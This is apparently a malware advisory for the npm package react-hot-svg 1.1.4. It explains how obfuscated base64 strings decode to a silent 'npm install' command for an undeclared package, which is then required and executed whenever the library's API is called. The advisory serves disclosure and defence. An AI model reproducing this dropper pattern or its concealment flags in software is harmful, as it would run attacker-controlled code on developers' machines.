MAL-2026-10439
Malicious code in react-hot-svg (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (847fe0ea93982597b0611e6fd23f1b77af40b7162baf338659fbff8deb7fb051) index.js in react-hot-svg 1.1.4 hides both a shell command and a package name as base64 strings named `svgValidateKey` and `svgValidatePattern`. When any of the exported API surface (`getPlugin`, `setPlugin`, `validateSvgContent`) is invoked, the code decodes `svgValidateKey` via `atob` to the string `npm install rollup-plugin-polyfill-handler --no-save --silent --no-audit --no-fund`, spawns it via `child_process.spawn` with `stdio: 'ignore'`, and on process exit `require()`s the base64-decoded module name `rollup-plugin-polyfill-handler` and immediately invokes its `.getPlugin()()` function. The `--no-save --silent --no-audit --no-fund` flags suppress output and prevent the added dependency from appearing in package.json or the lockfile. The obfuscation of both the command and the required module name, the SVG-themed cover identifiers, and the pattern of installing-then-requiring-then-executing an undeclared external package match a dropper that lands and executes attacker-controlled code from a separate npm package on any consumer who uses this library's advertised API.
Are you affected?
Enter the version of the package you're using.
Affected packages
No fixed version published yet for react-hot-svg (npm). Pin to a known-safe version or switch to an alternative.